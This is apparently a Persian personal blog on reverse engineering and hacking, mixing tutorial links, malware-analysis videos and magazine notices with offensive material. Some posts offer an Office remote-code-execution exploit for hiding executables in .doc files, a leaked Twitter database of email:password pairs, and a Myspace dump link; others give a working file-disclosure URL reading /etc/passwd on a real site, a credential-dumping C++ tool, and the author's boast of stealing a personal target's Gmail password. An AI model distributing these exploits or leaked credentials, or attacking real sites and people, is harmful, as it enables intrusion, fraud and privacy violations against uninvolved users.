nvr

علیرضا اینجاست

nvr

علیرضا اینجاست

nvr

اینجا خونمه

دنبال کنندگان ۴ نفر
این وبلاگ را دنبال کنید
تبلیغات
Blog.ir بلاگ، رسانه متخصصین و اهل قلم، استفاده آسان از امکانات وبلاگ نویسی حرفه‌ای، در محیطی نوین، امن و پایدار bayanbox.ir صندوق بیان - تجربه‌ای متفاوت در نشر و نگهداری فایل‌ها، ۳ گیگا بایت فضای پیشرفته رایگان Bayan.ir - بیان، پیشرو در فناوری‌های فضای مجازی ایران
آخرین نظرات
  • ۱۱ مرداد ۹۵، ۰۹:۵۶ - neighbour
    tnx
نویسندگان
پیوندها

سلام بچه ها،از همون ابتدای  انتشار آموزش های "رندوم" (2011-2012) به درخواست دوستان (ک البته شرمندشونم به علت اینکه نتونستم اون موقع به علت مشغله این کارو انجام بدم) اما در یک حرکت جسورانه تصمیم گرفتم به قولم وفا کنم  (; 
این آموزش ها 26 قسمت با عنوان :R4ndom’s Beginning Reverse Engineering Tutorials

که به امید خدا ترجمه شو شروع کردم و اگه عمری باشه ادامشون میدم ،فعلا قسمت اول رو  دانلود بفرمائید :
تمام فایل ها ضمیمه ی آموزش ها هستند

این آموزش ها اولین بار هست که به زبان فارسی ترجمه میشه همینطور  بعضی قسمت ها نیاز به توضیح بیشتر و همینطور آپدیت بود که انجام میشه تو طول آموزش ها

امیدوارم کسانی که بخوان تو این زمینه وارد بشن بتونه کمکی هرچند کوچک بکنه


لینک به منبع

  • ۰ نظر
  • ۱۸ مرداد ۹۵ ، ۱۹:۳۹
  • ۲۱ نمایش

CVE-2015-1650 and CVE-2015-1770 Remote Code Execution
The latest works for windows XP to Windows7 + office 2007 2010 2013 and
Windows 8 & Windows 8.1 + office 2007 2010

لینک

با این اکسپلویت میتونید فایل اجرایی داخل یه فایل doc قرار بدید و بعد از اجرای فایل doc تو نسخه های آسیب پذیر ذکر شده آفیس بدون استفاده از ماکرو فایل تزریق شده اجرا کنید.

  • ۲ نظر
  • ۱۱ مرداد ۹۵ ، ۰۹:۲۵
  • ۱۸ نمایش

دیتابیس لیک شده از توییتر که شامل 70.000.000 اکانت هست ، فرمت فایل دانلود .sql هست و فرمت قراری گیری اطلاعات به این صورت است :

Email : Passwrd

حجم 734.7 MB

برای دریافت لینک دانلود کامنت بزارید به ایمیلتون ارسال میشه !


لینک ریپورت شده ...!

  • ۱۶ نظر
  • ۱۵ تیر ۹۵ ، ۰۲:۵۰
  • ۳۰۱ نمایش

Myspace Data Dump

۱۲
تیر

بدون شرح

https://myspace.thecthulhu.com/
  • ۰ نظر
  • ۱۲ تیر ۹۵ ، ۰۴:۵۷
  • ۹۱ نمایش

سلام

امروز خیلی شانسی موفق شدم افزونه TB HIDE CONTENT برای ویبولتن رو دور بزنم !

منتها راستش رو بخواین دلم نمیاد روشو بگم ،چون هیچ سودی واسم نداره :)))

روی فروم NULLED تست شده !

  • ۰ نظر
  • ۱۱ تیر ۹۵ ، ۰۴:۴۳
  • ۵۷ نمایش

سلام

چند وقت پیش یک آسیب پذیری روی یک مدیریت محتوا به اسم سبدخرید نسخه ی flexv7 پیدا کردم که نمیخواستم این یکی رو مجانی خدمت شرکت مربوطش بکنم ولی با یه اشتباه (البته تجربه شد) این آسیب پذیری هم مجانی از آب در امد :))

تمامی فروشگاه های که از این cms استفاده میکردن این مشکل رو داشتن نمونش دیتابیس سایت tajgallery

+-----------------------------------------+
| SKH_accounts |
| SKH_admins |
| SKH_admins_deps |
| SKH_admins_log |
| SKH_admins_subdeps |
| SKH_advertiesments |
| SKH_advertiesments_categories |
| SKH_aff_commissions |
| SKH_aff_payments |
| SKH_backend_departments |
| SKH_backend_subdeps |
| SKH_bankbill_accounts |
| SKH_bankbills |
| SKH_brands |
| SKH_categories |
| SKH_category__product_options |
| SKH_category_product |
| SKH_category_product_options__variants |
| SKH_cities |
| SKH_cms_pages |
| SKH_content |
| SKH_countries |
| SKH_coupon_categories |
| SKH_currency_types |
| SKH_cusomer_log |
| SKH_custgroup_price |
| SKH_custgroups |
| SKH_customer_addresses |
| SKH_customer_reg_fields |
| SKH_customer_reg_fields_values |
| SKH_customer_reg_fields_values_quickreg |
| SKH_customers |
| SKH_discount_coupons |
| SKH_discussions |
| SKH_home_slider |
| SKH_iranmc |
| SKH_language_string_values |
| SKH_language_strings |
| SKH_languages |
| SKH_lists |
| SKH_lists_products |
| SKH_lotteries |
| SKH_lottery_winners |
| SKH_modules |
| SKH_news_table |
| SKH_order_price_discount |
| SKH_order_status |
| SKH_order_status_changelog |
| SKH_ordered_carts |
| SKH_ordered_coupons |
| SKH_orders |
| SKH_payment_modules_data |
| SKH_payment_types |
| SKH_payment_types__shipping_methods |
| SKH_product_options |
| SKH_product_options_categories |
| SKH_product_options_list |
| SKH_product_options_list_cats |
| SKH_product_options_set |
| SKH_product_options_values |
| SKH_product_pictures |
| SKH_product_statuses |
| SKH_products |
| SKH_products_opt_val_variants |
| SKH_profile |
| SKH_related_items |
| SKH_settings |
| SKH_settings_groups |
| SKH_shipping_methods |
| SKH_shopping_cart_items |
| SKH_shopping_cart_items_content |
| SKH_shopping_carts |
| SKH_sms_subscribers |
| SKH_subscribers |
| SKH_survey |
| SKH_survey_answers |
| SKH_system |
| SKH_tags |
| SKH_tags_products |
| SKH_tax_classes |
| SKH_tax_rates |
| SKH_tax_rates__zones |
| SKH_tax_zip |
| SKH_zones |
+-----------------------------------------+

یا فروشگاه دیگه ای که از همین cms استفاده میکنه : irkharid



من یک ایمیل با این محتوا به تیم سبدخرید فرستادم :



و اشتباه خوبه من (قیمت !)



در نهایت بدون حتی تشکر یا ... آسیب پذیری رو رفع کردن و من هم سرم بی کلاه موند...

اما وقتی این آسیب پذیری رو پیدا کردم و میتونستم دسترسی به فروشگاه ها بگیرم تو رویا سر میکردم که :
-اطلاعات مشتری ها رو جمع کنم که شامل اسم،شماره موبایل،آدرس و کد پستی بود میتونستم با سوشیال کلی کلاه برداری کنم.
-میتونستم یه درگاه بانک فیک درست کنم.
-میتونستم پین کد شماره حساب صحاب فروشگاه با شماره حساب خودم عوض کنم.
اما هیچ کدوم از این کارارو نکردم ! و کلی هم خوشحالم
  • ۰ نظر
  • ۰۷ تیر ۹۵ ، ۱۵:۲۷
  • ۴۱ نمایش

سلام

یادم نمیاد دقیقا چه زمانی بود قصد داشتم کل این کتابو ترجمه کنم که بیخیال شدم اما در هر صورت 2 بخش از این کتاب رو ترجمه کردم که الان اتفاقی پیداشون کردم..

موضوعات که بهش پرداخته شده :

C Programming Language
Camputer Memory
Assembly Language Basic
Debugging with gdb
Python Survival Skills
Stack Operations
Buffer Overflows
Local buffer overflow exploits
Exploit development process

لینک دانلود : قسمت اول دوم

  • ۰ نظر
  • ۳۱ خرداد ۹۵ ، ۱۳:۴۶
  • ۶۰ نمایش

بعد از چند وقت یه تارگت شخصی داشتم یعنی یه تصویه حساب حالا که پسورد جیمیل تارگتمو بدست آوردم گوگل شده کاسه ی داغتر از آش !



با این حساب هیچ جوره نمیشه به اکانت کسی لوگین کرد ؟! مگه داریم ؟ :o

  • ۰ نظر
  • ۲۳ خرداد ۹۵ ، ۱۴:۵۵
  • ۵۴ نمایش


تجزیه و تحلیل بدافزارها

راهنمای جامع مهندسی معکوس، تجزیه و تحلیل بدافزارها، جاسوس افزارها و روتکیت های کامپیوتری

سلام واسه دو هفته از محل کارم مرخصی گرفتم با خودم فکر کردم بهترین موقعیت که برم این کتاب دوست داشتنی رو بخرم و بخونم

تاالان یه 50 صفحه ای خوندم و راضی ام ازش یه خسته نباشید هم به میلاد عزیز بابت این کتاب عرض میکنم... <3 به شما هم پیشنهاد میشه برید این کتاب و تهیه کنید و بخونید :)


  • ۰ نظر
  • ۱۹ خرداد ۹۵ ، ۲۳:۱۷
  • ۸۹ نمایش

Have I been pwned?

۰۵
خرداد

سلام

هر چند وقت یکبار یک سری از این سایت های معروف هک میشه و کلی اکانت پخش میشه اگه میخواید تست کنید اکانتتون جزو این حملات هست یا نه به این سایت برید...


  • ۰ نظر
  • ۰۵ خرداد ۹۵ ، ۱۳:۴۹
  • ۱۲۱ نمایش

عنوان ویدیو : Malware Analysis - [Beginner] Malware Analysis - Unpacking with HxD and Python


لینک از یوتوب


لینک از آپارات


لینک برای دانلود پارت یک پارت دو


جدیدا حس میکنم تو مهندسی معکوس پایتون از اسمبلی مهمتر شده !

تو این ویدیو طرف میاد با یه هکس ادیتور فایل رو بررسی میکنی و یه اسکریپت با پایتون مینویسه که فایل رو آنپکش کنه ...

  • ۰ نظر
  • ۰۲ خرداد ۹۵ ، ۱۲:۵۷
  • ۱۳۱ نمایش

DOS Reversing Tutorials

۲۸
ارديبهشت

یک سری آموزش در رابطه با برنامه های تحت داس جمع کرده این دوستمون

Some explain how DOS works, how to translate from virtual address to physical address, not only cracking tutorials.

محتویات :

+ORC Packs.htm
64-bit versions of Windows do not support 16-bit components, 16-bit processes, or 16-bit applications.htm
64-bit versions of Windows do not support 16-bit components, 16-bit processes, or 16-bit applications_fi?iere
CERT Polska ¯ Blog Archive ¯ Honeynet Project Workshop CrackMe Solution.htm
CERT Polska ¯ Blog Archive ¯ Honeynet Project Workshop CrackMe Solution_fi?iere
DDEB.TXT
Debug.htm
debug.txt
Debug_fi?iere
debug_translated.htm
debug_translated_fi?iere
dumpexe.txt
File and Memory Offsets with DOS DEBUG _ Things that were not immediately obvious to me.htm
File and Memory Offsets with DOS DEBUG _ Things that were not immediately obvious to me_fi?iere
How to run 16 bit DOS .EXE files in Windows 7 - Microsoft Community.htm
How to run 16 bit DOS .EXE files in Windows 7 - Microsoft Community_fi?iere
howto32.txt
howto92.html
howto92_fi?iere
Howtocr1.htm
howtocrk.txt
lab10.pdf
Make older programs run in this version of Windows - Windows Help.htm
Make older programs run in this version of Windows - Windows Help_fi?iere
Mapping DOS Memory Allocation _ Dr Dobb's.htm
Mapping DOS Memory Allocation _ Dr Dobb's_fi?iere
MOVSW - Move Data from String to String.htm
MOVSW - Move Data from String to String_fi?iere
MS-DOS DEBUG Program.htm
MS-DOS DEBUG Program_fi?iere
README.DOC
Real-Mode Memory Management.htm
Real-Mode Memory Management_fi?iere
so many questions, so many troubles.htm
so many questions, so many troubles_fi?iere
TR - Collaborative RCE Tool Library.htm
TR - Collaborative RCE Tool Library_fi?iere
Unpacking DOS executables using DOSBox debugger.htm
Unpacking DOS executables using DOSBox debugger_fi?iere
Unpacking Dynamically Allocated Code ¯.htm
Unpacking Dynamically Allocated Code ¯_fi?iere
Volatility Labs Unpacking Dexter POS 'Memory Dump Parsing' Malware.htm
Volatility Labs Unpacking Dexter POS 'Memory Dump Parsing' Malware_fi?iere
WineHQ - Useful memory addresses.htm
WineHQ - Useful memory addresses_fi?iere
X86 Assembly_16 32 and 64 Bits - Wikibooks, open books for an open world.htm
X86 Assembly_16 32 and 64 Bits - Wikibooks, open books for an open world_fi?iere
x86 memory segmentation - Wikipedia, the free encyclopedia.htm
x86 memory segmentation - Wikipedia, the free encyclopedia_fi?iere

لینک
  • ۰ نظر
  • ۲۸ ارديبهشت ۹۵ ، ۱۵:۴۰
  • ۱۲۱ نمایش

Ransomware Overview

۲۸
ارديبهشت
  • ۰ نظر
  • ۲۸ ارديبهشت ۹۵ ، ۰۹:۳۸
  • ۱۰۳ نمایش

دو تا باگ پیدا کردم از این سایت یکیش که xss از نوع reflected به این صورت :

من این کد رو اجرا کردم تو قسمت مفسر پایتونش :


#!/usr/bin/python

# Open a file
fo = open("foo.txt", "rw+")
print "Name of the file: ", fo.name

# Assuming file has following 5 lines
# This is 1st line
# This is 2nd line
# This is 3rd line
# This is 4th line
# This is 5th line

line = fo.readline()
print "Read Line: %s" % (line)

# Again set the pointer to the beginning
fo.seek(0, 0)
line = fo.readline()
print "Read Line: %s" % (line)

# Close opend file
fo.close()

بعد اررور امد که فایل foo.txt پیدا نشد :

Executing the program....
$python2.7 main.py

Traceback (most recent call last):
  File "main.py", line 4, in 
    fo = open("foo.txt", "rw+")
IOError: [Errno 2] No such file or directory: 'foo.txt'

پس جای foo.txt اسکریپت بزارید اجرا میشه اما باگ اصلی یعنی local file disclosure به این صورت که شما وقتی وارد یکی از مفسر یا کمپایلر های سایت میشید وفتی یه فایلی رو سیو کنید براتون یه دایرکتوری میسازه وقتی روی فایل راست کلیک کنید آپشن های هست که یکیش دانلود فایل شماست که آدرسش به این صورت هست :


http://codingground2.tutorialspoint.com:8080/download_file?port=22820&cwd=[DIRECTORY]&file=[FILE]&sessionid=1462886206-20557


جای [DIRECTORY] و [FILE] میتونید هرچی که بخواید بزارید و دانلود کنید فقط چندتا مشکل هست یکیش اینکه ما رو ساب دامین هستنیم دوم اینکه هواستون به سیشن باشه که اکسپایر نشه ، به عنوان مثال دانلود فایل passwd :


http://codingground2.tutorialspoint.com:8080/download_file?port=22820&cwd=/etc&file=passwd&sessionid=1462886206-20557


این آسیب پذیری رو دقیقا دیروز پیدا کردم اما نتونستم کامل دسترسی بگیرم چون اول روی ساب دامین هست و دوم اینکه وب سرورش خیلی عجیبه و اولین باره شنیدمش ! ESC !!

Electronic Commerce Server (ECS)

از طریق ایمیل آسیب پذیری ها گزارش  شد

  • ۰ نظر
  • ۲۳ ارديبهشت ۹۵ ، ۰۱:۱۱
  • ۱۴۹ نمایش

سلام مطلبی در لینک زیر خوندم که واقعا جالبه پسورد فایل zip کش شده تو Credential Manager رو نمایش میده در نتیجه یکبار باید پسورد فایل مورد نظر را زده باشید که در Credential Manager کش شده باشه...

لینک


#include <Windows.h>
#include <wincred.h>
#include <iostream>

using namespace std;

/*
Credential Manager - Zip archives password retrieval for Win 8.x - Win 10
Author: kyREcon
*/

int main()
{

PCREDENTIALW * credBuf = NULL;

DWORD count;

CredEnumerateW(L"*.zip", NULL, &count, &credBuf);

if (ERROR_NOT_FOUND == GetLastError())
{
wcout << endl << "No credentials found in the user's credential set." << endl;
goto __cleanup;
}

if (!credBuf)
{
wcout << endl << "Memory Allocation Failed!" << endl;
goto __cleanup;
}


for (DWORD i = 0; i < count; i++)
{
if (((*credBuf[i]).CredentialBlob) && ((*credBuf[i]).TargetName))
{
wcout << endl << "------------------------------------------------------" << endl;
wcout << "Target: " << (wchar_t *)(*credBuf[i]).TargetName << endl << endl;
wcout << "Password: " << (wchar_t *)(*credBuf[i]).CredentialBlob << endl;
wcout << "------------------------------------------------------" << endl << endl;
}
}

__cleanup:

if (credBuf)
{
CredFree(credBuf);
credBuf = NULL;
}

cin.get();
return 0;

}
  • ۰ نظر
  • ۱۴ ارديبهشت ۹۵ ، ۱۲:۵۲
  • ۹۸ نمایش

سلام 

مجله افسک یا offsec شماره چهارم 

http://offsec.ir/mag

  • ۰ نظر
  • ۳۰ فروردين ۹۵ ، ۰۰:۵۳
  • ۱۸ نمایش

nvr Crackme

۱۶
فروردين

سلام یه کرک می نوشتم که شما در نهایت باید به متن "Well done! 2\\2" برسید...

هفته ی دیگه آموزش و سورس رو همینجا قرار میدم

لینک دانلود

حجم فایل : 5.18 کیلوبایت

  • ۰ نظر
  • ۱۶ فروردين ۹۵ ، ۲۰:۴۶
  • ۱۲۲ نمایش

سلام

یکی از قفل های ایرانی از کد زیر برای تشخیص محیط ماشین مجازی استفاده میکنه :

internal static bool Z64216988()
{
ManagementObjectSearcher searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem");
string str2 = string.Empty;
string str = string.Empty;
foreach (ManagementObject obj2 in searcher.Get())
{
str2 = obj2["Manufacturer"].ToString().ToLower();
if (str2.Contains("microsoft corporation"))
{
if (obj2["Model"] == null)
{
return true;
}
if (!obj2["Model"].ToString().ToLower().Contains("surface"))
{
return true;
}
}
if (((str2.Contains("red hat") | str2.Contains("vmware")) | str2.Contains("virtual")) | str2.Contains("qemu"))
{
return true;
}
if (obj2["Model"] != null)
{
str = obj2["Model"].ToString().ToLower();
if (((str.Contains("kvm") | str.Contains("vmware")) | str.Contains("virtual")) | str.Contains("qemu"))
{
return true;
}
}
}
return false;
}


خب کد بالا متد های Manufacturer , Model را از کلاس Win32_ComputerSystem با استفاده از WQL پرس و جو میکنه که همانطور که در خروجی کد میبینید میشه محیط مجازی رو تشخیص داد.

همچنین میتونین از ابزار زیر هم برای ساخت query های WMI استفاده کنید :




لینک های مرتبط :

 بحث در مورد (WQL(WMI Query Language

 WMI Code Creator v1.0


اما سوالی که واسه خودم پیش امده اینکه چطور میشه جوابی که از اجرای query میگیره رو عوض کرد ؟ یا اینکه این مشخصات کجا ذخیره میشن ؟ ...

  • ۰ نظر
  • ۲۵ اسفند ۹۴ ، ۱۴:۲۶
  • ۵۹ نمایش

سلام

امروز همینطوری حدود 4 یا 5 ساعت داشتم سایت شرکت امن پرداز رو چک میکردم که به 3 تا باگ برخوردم تصمیم گرفتم بهشون اطلاع بدم و همچنین یه بهونه ای بشه یه پست برای بلاگ بزنم...

خب از اوجایی که حوصله توضیح و تایپ کردن رو ندارم برای هر باگ یه ویدو درست کردم که اطلاعات اضافی رو همینجا میگم.


باگ اول :

خب اولین باگ اینطوریه که ما میتونیم به همه ی فایل هایی که توسط هرکی Attachment شده رو ببینیم ، لینک ویدیو :

http://www.aparat.com/v/wZprP

باگ دوم :

علاوه بر اینکه ما میتونیم Attachment هارو ببینیم میتونیم هرکدام را پاک نیز بکنیم :-D ، لینک ویدیو :

http://www.aparat.com/v/5vEPL

باگ آخر :

باگ آخر هم یه xss خیلی ساده هست ! و سوال اینجاست که چرا هیچ فیلتری روی ورودی صورت نگرفته ؟! ، لینک ویدیو :

http://www.aparat.com/v/MOCkJ
  • ۱ نظر
  • ۱۹ آذر ۹۴ ، ۰۱:۰۹
  • ۲۵۹ نمایش
/*------------------------------------------------------------
   HELLOWIN.C -- Displays "Hello, Windows 98!" in client area
                 (c) Charles Petzold, 1998
  ------------------------------------------------------------*/

#include <windows.h>

LRESULT CALLBACK WndProc (HWND, UINT, WPARAM, LPARAM) ;

int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,
                    PSTR szCmdLine, int iCmdShow)
{
     static TCHAR szAppName[] = TEXT ("HelloWin") ;
     HWND         hwnd ;
     MSG          msg ;
     WNDCLASS     wndclass ;

     wndclass.style         = CS_HREDRAW | CS_VREDRAW ;
     wndclass.lpfnWndProc   = WndProc ;
     wndclass.cbClsExtra    = 0 ;
     wndclass.cbWndExtra    = 0 ;
     wndclass.hInstance     = hInstance ;
     wndclass.hIcon         = LoadIcon (NULL, IDI_APPLICATION) ;
     wndclass.hCursor       = LoadCursor (NULL, IDC_ARROW) ;
     wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH) ;
     wndclass.lpszMenuName  = NULL ;
     wndclass.lpszClassName = szAppName ;

     if (!RegisterClass (&wndclass))
     {
          MessageBox (NULL, TEXT ("This program requires Windows NT!"), 
                      szAppName, MB_ICONERROR) ;
          return 0 ;
     }
     
     hwnd = CreateWindow (szAppName,                  // window class name
                          TEXT ("The Hello Program"), // window caption
                          WS_OVERLAPPEDWINDOW,        // window style
                          CW_USEDEFAULT,              // initial x position
                          CW_USEDEFAULT,              // initial y position
                          CW_USEDEFAULT,              // initial x size
                          CW_USEDEFAULT,              // initial y size
                          NULL,                       // parent window handle
                          NULL,                       // window menu handle
                          hInstance,                  // program instance handle
                          NULL) ;                     // creation parameters
     
     ShowWindow (hwnd, iCmdShow) ;
     UpdateWindow (hwnd) ;
     
     while (GetMessage (&msg, NULL, 0, 0))
     {
          TranslateMessage (&msg) ;
          DispatchMessage (&msg) ;
     }
     return msg.wParam ;
}

LRESULT CALLBACK WndProc (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
     HDC         hdc ;
     PAINTSTRUCT ps ;
     RECT        rect ;
     
     switch (message)
     {
     case WM_CREATE:
          PlaySound (TEXT ("hellowin.wav"), NULL, SND_FILENAME | SND_ASYNC) ;
          return 0 ;
          
     case WM_PAINT:
          hdc = BeginPaint (hwnd, &ps) ;
          
          GetClientRect (hwnd, &rect) ;
          
          DrawText (hdc, TEXT ("Hello, Windows 98!"), -1, &rect,
                    DT_SINGLELINE | DT_CENTER | DT_VCENTER) ;
          
          EndPaint (hwnd, &ps) ;
          return 0 ;
          
     case WM_DESTROY:
          PostQuitMessage (0) ;
          return 0 ;
     }
     return DefWindowProc (hwnd, message, wParam, lParam) ;
}
  • ۰ نظر
  • ۲۷ آبان ۹۴ ، ۱۲:۲۴
  • ۲۰۸ نمایش

بدافزار باجگیر، اصطلاحی است که یکی دو سال است زیاد می‌شنویم. کدام شخص آشنا با رایانه است که خودش مبتلا به یک بدافزار باجگیر نشده باشد یا کسی را که به چنین بلایی دچار شده باشد نشناسد! کسانی که قربانی چنین بدافزاری شده‌اند طعم از دست دادن تمامی داده‌ها، عکس‌ها، خاطرات، پروژه‌ها، و پایان‌نامه‌هایشان را چشیده‌اند یا حداقل تا مرز این اتفاق پیش رفته‌اند...

یک بدافزار باجگیر کار خود را مخفیانه شروع می کند: شروع آلوده شدن به این بدافزارها از هر راهی ممکن است. مثلا یک ایمیل آلوده، یک سایت مشکل‌دار، یا یک فلش ویروسی و ... می‌تواند نقطه شروع آلودگی به این بدافزارها باشد. بدافزار بلافاصله کار خودش را با غیرفعال کردن مکانیزم پشتیبان‌گیری ویندوز شروع کرده و سپس یکی یکی فایل‌های مهم شما (از عکس‌های خاطرات سفر قبلیتان گرفته تا آخرین نسخه مقاله‌ای که در حال تهیه آن بودید) را رمز می‌کند. هنگامی‌که این کار به خوبی انجام شد و فایلی باقی نماند، تازه آن وقت است که یک صفحه بزرگ ظاهر شده و به شما اعلام می‌کند که یا پول درخواست شده را پرداخت می‌کنید و فایل‌های شما رمزگشایی می‌شوند و یا دیگر باید با فایل‌های خود خداحافظی کنید.

سال‌هاست که این بدافزارها وجود داشته‌اند، ولی پیشرفت‌های حاصل شده در الگوریتم‌های رمزنگاری، شبکه‌های ناشناس (مانند TOR) و واحدهای پول ناشناس مانند بیت‌کوین که ردگیری پول را دشوار و غیرممکن می‌کنند، باعث شده است که مقابله با این بدافزارها هر روز سخت‌تر و سخت‌تر شود، به نحویکه اگر یک بدافزار از الگوریتم‌های استاندارد استفاده کرده و خطایی در پیاده‌سازی خود نداشته باشد، ممکن است بازگرداندن اطلاعات بدون پرداخت پول (یا استفاده از داده‌های پشتیبان قدیمی) غیر ممکن باشد. همین نکته و میزان درآمد بالای هکرها از این راه، باعث رشد این شیوه باجگیری در سال‌های اخیر شده است.

هدف از مسابقه جاری که با همکاری انجمن رمز ایران و تیم ضدویروس پادویش طراحی شده است، جلب توجه جامعه علمی به این مبحث مبتلابه جامعه و آشنایی با عملکرد این بدافزارها و در نهایت جستجوی راه‌هایی برای مقابله با آن‌ها است. بدافزارهایی که خواه ناخواه پیوند نامبارکی با علم رمزشناسی پیدا کرده‌اند.

شرکت‌کنندگان در این مسابقه در چند مرحله با نمونه‌هایی از بدافزارهای باجگیر مواجه شده و باید راهی برای بازگرداندن اطلاعات قربانی بدون پرداخت باج و سود رساندن به باجگیرها پیدا کنند. هر مرحله با مرحله قبل کاملا متفاوت بوده و روش حل خلاقانه خاص خود را دارد. همچنین سعی شده است که حتی شرکت‌کنندگانی که با دانش مهندسی معکوس بدافزار آشنا نیستند نیز بتوانند از این مسابقات نهایت استفاده را ببرند، هر چند در مراحل آخر آشنایی با این دانش بسیار راهگشا خواهد بود.

مسابقه بصورت offline بوده و از تاریخ ۹ شهریور شروع شده و در روز ۱۶ شهریور پایان می یابد. به برندگان مسابقه در اختتامیه کنفرانس جوایزی اهدا خواهد شد. امیدواریم برگزاری این مسابقات علاوه بر ایجاد شور و انگیزه در جامعه جوان علمی، باعث توجه بیشتری به این مقوله مهم در آینده شود.

نحوه شرکت در مسابقه و دریافت سوال مرحله اول:

برای شرکت در مسابقه و دریافت سوال اولین مرحله مسابقه، کافیست - پس از شروع مسابقه - یک ایمیل خالی به آدرس iscisc2015@amnpardaz.com ارسال کنید.

شروع مسابقه راس ساعت ۰۰:۰۱ بامداد روز ۹ شهریور ۹۴ (به وقت تهران) خواهد بود و فقط به ایمیل‌هایی که پس از این ساعت ارسال شوند سوال مسابقه ارسال خواهد شد.

لازم به ذکر است که شرکت کنندگان می‌بایست در طول مسابقات از یک ایمیل برای ارسال پاسخ‌ها استفاده کنند و ایمیل خود را تغییر ندهند.


  • ۱ نظر
  • ۱۲ شهریور ۹۴ ، ۱۷:۳۱
  • ۲۶۴ نمایش

مجله امنیت اطلاعات - شرکت نرم‌افزاری امن پرداز - شماره دهم


در این شماره خواهید خواند:

  • توسعه نرم افزار به روش اسکرام
  • آ گاهی خودکار از تغییرات و مشکلات در پیکربندی شبکه IT سازمان «نگرشی ز یستی »
  • اخبار فناوری اطلاعات
  • نکاتی که در نصب آنتی ویروس روی رایانه های سازمانتان لازم است به آن ها توجه داشته باشید...
  • حمله هدفمند cozyDuke به کاخ سفید
  • بدافزار مرموز سیمدا


برای دریافت مجله امنیت اطلاعات کلیک کنید

  • ۱ نظر
  • ۱۶ تیر ۹۴ ، ۱۰:۰۳
  • ۳۲۰ نمایش

سلام

فروم تازه با محور مهندسی معکوس احداث شده که از همه ی دوستداران این عرصه درخواست میکنم به این فروم بپیوندند..

لینک


Persian RCE FORUM!

  • ۰ نظر
  • ۰۵ تیر ۹۴ ، ۱۲:۳۴
  • ۲۹۸ نمایش


موضوعات:
  • آسیب پذیری 0day بحرانی و مضحک Joomla
  • توسعه اکسپلویت در سیستم‌های مبتنی بر ARM
  • XML RPC و استفاده از این پروتکل در حملات وب سرویس
  • نفوذ به شبکه‌ها و سامانه‌های کنترل صنعتی
  • آسیب پذیری Logjam و زیرسوال رفتن ارتباطات امن TLS
  • چالش در مکانیزم‌های حفاظتی و امنیتی در سیستم‌های عامل و مفسر‌ها (قسمت اول)
  • ساختار ذخیره‌سازی رمز‌های عبور در مرورگر Firefox و سوء استفاده از آن
لینک دانلود
  • ۱ نظر
  • ۲۱ خرداد ۹۴ ، ۱۵:۱۲
  • ۵۸۹ نمایش



سلام

سری بعد که یک نفر عکس یه گربه‌ی ملوس رو واستون ارسال کرد قبل از کلیک کردن روی اون حواستون باشه، ممکنه این کار باعث هک‌شدن شما بشه...
درسته!

یه عکس به ظاهر معمولی می‌تونه باعث هک کامپیوتر شما بشه و این رو مدیون تکنیکی هستیم که Saumil Shah از هند در کنفراس Hack In The Box که هفته‌ی پیش در آمستردام برگزار شد به ما معرفی کرد. ساموئل اسم این روش رو Stegosploit: Hacking With Pictures گذاشته.

 

در این روش هکر کدهای مخرب رو در یک عکس قرار میده و کافیه قربانی این عکس که ممکنه در فایل‌های پیوست یک ایمیل یا در PDF باشه رو باز کنه تا کنترل کامل سیستمش رو در اختیار هکر قرار بده.
ویدئوی اول مربوط به ساخت عکس آلوده:


لینک دانلود

مشاهده آنلاین


ویدئوی دوم مربوط به اجرای دستور از راه دور روی سیستم قربانی:

لینک دانلود

مشاهده آنلاین


لینک مقاله


  • ۱ نظر
  • ۱۳ خرداد ۹۴ ، ۱۳:۲۰
  • ۴۲۰ نمایش

زیرخاکی

۲۲
ارديبهشت

سلام

خیلی از فروم ها هستند که قدمتی طولانی دارند مثل آشیانه ، ایرانویج ، پی سی ورلد ، برنامه نویس و یا ....

من قصد دارم مطالبی که از این فروم ها به درد بخور هست که صد البته این طور هم هست را جمع آوری کنم چرا که خدایی نکرده روزی این فروم ها از دسترس خارج میشن و ..

در کل دونه به دونه مطلابشون داخل وبلاگ با ذکر منبع قرار میدهم ..


  • ۱ نظر
  • ۲۲ ارديبهشت ۹۴ ، ۱۳:۱۲
  • ۲۹۵ نمایش

offsec Magazine Call For Paper

۱۷
ارديبهشت

offsec Magazine Call For Paper



سلام

ما یه مجله داشتیم که از وقتی بچه ها رفتند سربازی دیگه غیر فعال شد !

اما ما قصد داریم که دوباره راه اندازی اش کنیم.

همچنین از شما درخواست میکنیم در مباحث زیر اگر مقاله ای دارید یا میتونید بنویسید برای ما ارسال کنید تا با نام خودتان در این شماره از مجله قرار بگیره.

 

cryptography

Steganography

network

Social engineering - security

RCE - malware analysis - vuln analysis - and etc

و..

البته من عناوینی که گذاشتم خیلی جامع است ، و منظورم این است که مقاله ها مربوط به این زمینه ها باشند یا اگر نیستند و شما دوست دارید میتونید مقاله را برای ما ارسال کنید و ما تصمیم میگیریم که در این شماره یا شماره دیگر انتشار بدیم.

 

حداکثر تا 27 اردیبهشت مقاله را برای ما به ایمیل خودم یعنی coc.nimaarek ات ساین G میل . کام ارسال کنید یا از طریق فرم صفحه ی تماس با من برای من ارسال کنید.

مرسی منتظر مشارکت شما هستیم :)

  • ۰ نظر
  • ۱۷ ارديبهشت ۹۴ ، ۱۴:۵۸
  • ۳۶۱ نمایش

Debugging Pdf Shellcode

۱۵
ارديبهشت

توضیح :

This video demonstrates debugging shellcode extracted from a target PDF attack. The shellcode has been compiled into a functional PE binary so that we can readily examine its behavior

لینک مستقیم
مشاهده آنلاین
  • ۰ نظر
  • ۱۵ ارديبهشت ۹۴ ، ۰۰:۵۰
  • ۲۷۸ نمایش

در این ویدیو یک بدافزار به صورت استاتیک مورد تجزیه و تحلیل قرار میگیرد

لینک مستقیم

مشاهده آنلاین

  • ۰ نظر
  • ۱۵ ارديبهشت ۹۴ ، ۰۰:۴۷
  • ۲۰۰ نمایش
در این فیلم آموزشی یاد میگیرید که چطور ابزارهای مورد نیاز آنالیز بدافزار را کانفینگ کنید و یک آزمایشگاه بدافزار درست کنید

لینک مستقیم از آپارات
مشاهده آنلاین
  • ۰ نظر
  • ۱۵ ارديبهشت ۹۴ ، ۰۰:۴۲
  • ۲۵۳ نمایش

دومین کنفرانس پایتون ایران

